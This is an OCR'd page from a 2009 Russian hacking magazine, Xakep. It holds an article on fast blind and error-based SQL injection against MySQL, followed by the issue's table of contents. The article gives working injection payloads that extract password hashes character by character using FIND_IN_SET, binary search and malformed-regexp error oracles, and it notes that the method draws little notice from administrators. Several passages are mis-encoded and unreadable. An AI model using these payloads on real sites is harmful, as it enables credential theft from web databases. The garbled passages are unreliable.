ÃÂÃÂ•ÃÂ¡ÃÂ›ÃÂ£ÃÂ§ÃÂÃÂ™ÃÂÃÂž CUDA ÃÂ˜ÃÂ”ÃÂ•ÃÂœ? phpMyAdmin - Xakep Online

More documents

Recommendations

Info

взлом ОШИБКИ REGEXP В ИСХОДНЫХ КОДАХ MYSQL ФУНКЦИЯ FIND_IN_SET СОБСТВЕННОЙ ПЕРСОНОЙ ,5,6,7,8,9,a,b,c,d,e,f'); HTTP://WWW links • https://forum. antichat.ru/ thread43966.html — все о SQL Injection. • dev.mysql.com/ sources/doxygen/ mysql-5.1/ regerror_8c-source. html — исходники MySQL, отвечающие за отображение ошибок regexp. • dev.mysql.com/doc — документация по MySQL (рекомендую). • ru.wikipedia.org/ wiki/Двоичный_поиск — базовые алгоримы надо знать! WARNING warning Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут! 066 2. В БД находится символ: 'b'. Запускаем алгоритм: 1) Íàõîäèì ñåðåäèíó äèàïàçîíà [0,1,2,3,4,5,6,7, 8,9,a,b,c,d,e,f]; ñåðåäèíîé ÿâëÿåòñÿ ñèìâîë '8' 2) Ñðàâíèâàåì, – êîä ñèìâîëà 'b' áîëüøå èëè ìåíüøå, ÷åì êîä ñèìâîëà '8'? (øëåì çàïðîñ) 3) Êîä áîëüøå, ïîýòîìó íà ñëåäóþùóþ èòåðàöèþ óæå áåðåì äèàïàçîí [8,9,a,b,c,d,e,f]; ñåðåäèíîé ÿâëÿåòñÿ ñèìâîë 'ñ' 4) Ñðàâíèâàåì, – êîä ñèìâîëà 'b' áîëüøå èëè ìåíüøå, ÷åì êîä ñèìâîëà 'ñ'? (øëåì çàïðîñ) 5) Êîä ìåíüøå, ïîýòîìó íà ñëåäóþùóþ èòåðàöèþ áåðåì äèàïàçîí [8,9,a,b,c]; ñåðåäèíîé ÿâëÿåòñÿ ñèìâîë 'a' 6) Ñðàâíèâàåì, – êîä ñèìâîëà 'b' áîëüøå, ÷åì êîä ñèìâîëà 'a'? (øëåì çàïðîñ) 7) Êîä áîëüøå, ïîýòîìó íà ñëåäóþùóþ èòåðàöèþ áåðåì äèàïàçîí [a,b,c]; ñåðåäèíîé ÿâëÿåòñÿ ñèìâîë 'b' 8) Ñðàâíèâàåì, – êîä ñèìâîëà 'b' áîëüøå èëè ìåíüøå, ÷åì êîä ñèìâîëà 'b'? (øëåì çàïðîñ) 9) Êîä íè áîëüøå è íå ìåíüøå, çíà÷èò, ñèìâîë â ÁÄ = 'b' Таким образом, в зависимости от конкретной реализации алгоритма, мы отправляем до 5-6 запросов на определение символа. И это в худшем случае, так как символ может найтись и раньше. Итого получаем примерно 160-170 запросов на получение MD5-хеша. Уже лучше, но зачем останавливаться на достигнутом, если можно действовать еще быстрее? ИСПОЛЬЗОВАНИЕ FIND_IN_SET() И ПОДОБНЫХ ФУНКЦИЙ Функция find_in_set(str,strlist) используется для поиска подстроки среди списка строк, разделенных символом ',' и возвращает номер той строки из списка, которая равна переданному аргументу. То есть: mysql> SELECT FIND_IN_SET('b','a,b,c,d'); -> 2 Код символа из базы данных можно узнать при помощи запроса: select find_in_set((substring((select password from users limit 1),1,1)),'0,1,2,3,4 В результате мы получаем номер символа во множестве '0,1,2 ,3,4,5,6,7,8,9,a,b,c,d,e,f'. К примеру, для символа 'b', этот запрос вернет 12. А теперь подумаем, что же можно из этого выжать? Для того чтобы принять результаты запроса, мы должны как-то научиться принимать числа, являющиеся результатом. Но непосредственно при слепой SQL-инъекции мы этого сделать не можем. А что, если мы имеем дело с инъекцией, к примеру, в скрипте отображения новостей, и в зависимости от id, переданного скрипту, будем видеть разные странички? Тогда боевой запрос, нужный для получения символов из MD5, будет выглядеть вот так: news.php?id=find_in_set(substring((select passhash from users limit 0,1),1,1),'0,1,2,3, 4,5,6,7,8,9,a,b,c,d,e,f') Тогда, в зависимости от номера символа в строке '0,1,2,3,4,5,6,7 ,8,9,a,b,c,d,e,f', мы будем видеть новость с id, соответствующим символу пароля. Для удобства использования на практике нужно: 1) Âûäåëèòü êëþ÷åâûå ñëîâà íà ñòðàíèöàõ ñ íóæíûìè id 2) Îòïðàâèòü çàïðîñû ñ find_in_set äëÿ êàæäîãî ñèìâîëà èç ÁÄ 3) Âûÿñíèòü, ñòðàíèöó ñ êàêèì id ìû ïîëó÷èëè è âûâåñòè íà ýêðàí êîä ñèìâîëà То есть, для получения MD5-хеша нам потребуется выявить 16 страниц с уникальными id, по одной странице для каждого символа алфавита, а также отправить 32 запроса для определения значения каждого символа. В итоге, при использовании этого метода нам потребуется отправить всего 48 запросов на сервер, 16 из которых никакого подозрения читающего логи админа вызвать не могут. Изначально этот метод предложили +toxa+ и madnet. Они же заметили, что помимо функции find_in_set для реализации подобной атаки можно использовать функции LOCATE(),INSTR(),ASCII(),ORD(). Причем, ASCII() и ORD() даже предпочтительнее за счет того, что они присутствуют не только в MySQL. Способ работает быстро, но обладает рядом недостатков. К примеру, на сайте идентификаторы новостей могут быть распределены неравномерно, то есть скрипт приходится затачивать под каждый сайт индивидуально. Еще одной проблемой является то, что для большого количества символов в алфавите нужно большое количество уникальных страниц, которые не всегда присутствуют. В общем, мотаем на ус и двигаемся дальше. XÀÊÅÐ 07 /127/ 09
взлом ИСПОЛЬЗОВАНИЕ FIND_IN_SET() + MORE1ROW Если хорошенько поиграться с методом, предложенным выше, можно заметить, что все его минусы сводятся к тому, что далеко не на всех сайтах возможно получить достаточное количество различных страниц, зависящих от одного параметра. Решим эту проблему. Вспомним метод, предложенный Elekt'ом в ][ #111, который основан на использовании ошибки «Subquery returns more than 1 row».Суть метода заключается в том, чтобы заставить скрипт выводить ошибку SQL в зависимости от результата SQL-запроса. На данный момент, чтобы спровоцировать БД на вывод ошибки, наиболее часто используется запрос: SELECT 1 UNION SELECT 2 – который вернет ошибку: #1242 — Subquery returns more than 1 row ПРИМЕР ЭКСПЛОЙТА, НАПИСАННОГО ЯВНО НОВИЧКОМ Также ZaCo нашел альтернативный вариант запроса, который провоцирует БД на вывод ошибки в зависимости от условия: "x" regexp concat("x{1,25", if(@@version5, "5}", "6}") select 1 regexp if(1=1,'(',2) #1139 — Got error 'parentheses not balanced' from regexp INFO В том случае, если версия MySql не равна 5, этот запрос вернет ошибку: #1139 — Got error 'invalid repetition count(s)' from regexp. Немного порывшись в исходниках MySql и погуглив, можно найти еще 9 ошибок, которые возвращает неправильный regexp. Итого, от сервера мы можем получить 11 видов ошибок + 1 состояние, когда ошибки нет: SELECT 1 No error select if(1=1,(select 1 union select 2),2) #1242 — Subquery returns more than 1 row select 1 regexp if(1=1,"x{1,0}",2) #1139 — Got error 'invalid repetition count(s)' from regexp select 1 regexp if(1=1,"x{1,(",2) #1139 — Got error 'braces not balanced' from regexp select 1 regexp if(1=1,'[[:]]',2) #1139 — Got error 'invalid character class' from regexp select 1 regexp if(1=1,'[[',2) #1139 — Got error 'brackets ([ ]) not balanced' from regexp select 1 regexp if(1=1,'(({1}',2) #1139 — Got error 'repetition-operator operand invalid' from regexp select 1 regexp if(1=1,'',2) #1139 — Got error 'empty (sub)expression' from regexp XÀÊÅÐ 07 /127/ 09 select 1 regexp if(1=1,'[2-1]',2) #1139 — Got error 'invalid character range' from regexp select 1 regexp if(1=1,'[[.ch.]]',2) #1139 — Got error 'invalid collating element' from regexp select 1 regexp if(1=1,'\\',2) #1139 — Got error 'trailing backslash (\)' from regexp Пока просто примем это во внимание. Теперь самое время вспомнить о функции find_in_set. Если искомый символ есть во множестве подстрок, она вернет номер подстроки, если нет — вернет 0. Попробуем привязать результат работы этой функции к различным кодам ошибок и передадим вот такой запрос: select * from users where id=-1 AND "x" regexp concat("x{1,25", if( find_in_set( substring((select passwd from users where id=1),1,1), 'a,b,c,d,e,f,1,2,3,4,5,6' )>0, (select 1 union select 2), "6}" ) ) В результате, если первый символ пароля находится во множестве 'a,b,c,d,e,f,1,2,3,4,5,6', то запрос вернет: #1242 — Subquery returns more than 1 row А если не находится, то: #1139 — Got error 'invalid repetition info Большим преимущест вом последнего из перечисленных методов является то, что он с тем же успехом может работать и в INSERT, и в UPDATE запросах. DVD dvd На диске ты сможешь найти скрипты для работы с SQL-инъекциями с использованием описанных в статье методов. 067
Page 1 and 2:
ЛУЧШИЙ СОФТ ДЛЯ БРУ
Page 3 and 4:
НОВЫЕ СПОСОБЫ ВЗЛО
Page 5 and 6:
The 2009 SourceForge.net Community
Page 8:
PC27 >> meganews Miranda 0.8 бол
Page 12 and 13:
meganews Чистки на RapidSha
Page 14 and 15:
PC27 >> meganews iPhone ускор
Page 16 and 17:
meganews PC27 Ябблоки без
Page 19 and 20: Сплойтпак для твое
Page 21 and 22: ferrum 19000 руб. 10000 руб.
Page 23 and 24: FTP, МБАЙТ/С >> ferrum ZyXEL
Page 26 and 27: pc_zone The 2009 SourceForge.net Co
Page 28 and 29: pc_zone INFO The 2009 SourceForge.n
Page 30 and 31: pc_zone ГЛЕБ ПОЛИКАРПО
Page 32 and 33: pc_zone СРАВНЕНИЕ ПРОИ
Page 34 and 35: 10 TOOLS 10 TOOLS >> pc_zone 10 TOO
Page 36 and 37: pc_zone 10 TOOLS 10 TOOLS 10 TOOLS
Page 38 and 39: В ГОСТЯХ У СУППОРТА
Page 40 and 41: С ЭТОГО САЙТА НАЧИН
Page 42 and 43: взлом RAND IS NOT RAND RAND IS
Page 44: RAND IS NOT RAND RAND IS NOT RAND >
Page 47 and 48: взлом 1. Сливаем сор
Page 49 and 50: взлом № 6 ЗАДАЧА: СО
Page 51 and 52: обзор эксплоитов о
Page 57 and 58: взлом CRACKME ОТЧАЯННО
Page 59 and 60: взлом LOG EXPLOIT: XMB 1.9.11
Page 61 and 62: взлом ДАМП ПАМЯТИ У
Page 63 and 64: взлом ЭТО И ЕСТЬ PHPIN
Page 65 and 66: взлом curl "http://site.com/in
Page 67: взлом МЕТОД СРАБОТ
Page 71 and 72: Реклама
Page 73 and 74: взлом в наличии nginx,
Page 75 and 76: сцена ДЖОЭЛ И ПРОГР
Page 77 and 78: сцена УЮТНЫЙ БЛОЖЕ
Page 79 and 80: unixoid ФАЙЛОВАЯ СИСТЕ
Page 81 and 82: unixoid ДВЕ РАЗНЫЕ ГРА
Page 84 and 85: unixoid БЛОКИ С ПРЯМОЙ
Page 86 and 87: unixoid СТРУКТУРА КАТА
Page 88 and 89: ++++ >> coding ++++ ++++ ++++ 1 2 3
Page 90 and 91: ++++ >> coding ++++ ++++ ++++ ++++
Page 92 and 93: ++++ >> coding ++++ ++++ ++++ РО
Page 94 and 95: ++++ >> coding ++++ ++++ ++++ ++++
Page 96 and 97: ++++ >> coding ++++ ++++ ИГОРЬ
Page 98 and 99: ++++ >> coding ++++ ++++ ++++ ++++
Page 100: ++++ ++++ ++++ ++++ ++++ ++++ ++++
Page 103 and 104: coding вводить их в ка
Page 105 and 106: ПОДПИСКА В РЕДАКЦИ
Page 107 and 108: phreaking «ПИШЕМ НА СИ П
Page 109 and 110: phreaking ЕСЛИ НАУЧИШЬС
Page 112 and 113: SYN/ACK СЕРГЕЙ «GRINDER» Я
Page 114 and 115: SYN/ACK USERGATE ПОЗВОЛЯЕТ
Page 116 and 117: ХАКЕР.PRO SYN/ACK ПОЧТОВ
Page 118 and 119:
SYN/ACK СЕРГЕЙ ЯРЕМЧУК
Page 120 and 121:
SYN/ACK В WIN2K8 GPO ПО УМОЛ
Page 122 and 123:
SYN/ACK NATHAN BINKERT / NAT@SYNACK
Page 124 and 125:
SYN/ACK ЕВГЕНИЙ ЗОБНИН
Page 126 and 127:
SYN/ACK 1:0 prio 1:0 htb default 15
Page 128 and 129:
SYN/ACK ЕВГЕНИЙ ЗОБНИН
Page 130 and 131:
SYN/ACK ВЫБОР ПАРАМЕТР
Page 132 and 133:
ХАКЕР.PRO SYN/ACK ОСНОВН
Page 134 and 135:
units АЛЕКСАНДР ЛОЗОВ
Page 136 and 137:
units ЭЛЕКТРОСУДОРОЖ
Page 138 and 139:
units E-MAIL UNITED: НА ПИСЬ
Page 140 and 141:
59% HEALTH 59% HEALTH 13% ARMOR Д
Page 142 and 143:
units МАГ / ICQ 884888, HTTP://W
Page 144 and 145:
units A: Действительно
Page 146:
http:// WWW2 ПОЛУЧИТЬ IP-А
show all

ÃÂÃÂ•ÃÂ¡ÃÂ›ÃÂ£ÃÂ§ÃÂÃÂ™ÃÂÃÂž CUDA ÃÂ˜ÃÂ”ÃÂ•ÃÂœ? phpMyAdmin - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂÃÂ•ÃÂ¡ÃÂ›ÃÂ£ÃÂ§ÃÂÃÂ™ÃÂÃÂž CUDA ÃÂ˜ÃÂ”ÃÂ•ÃÂœ? phpMyAdmin - Xakep Online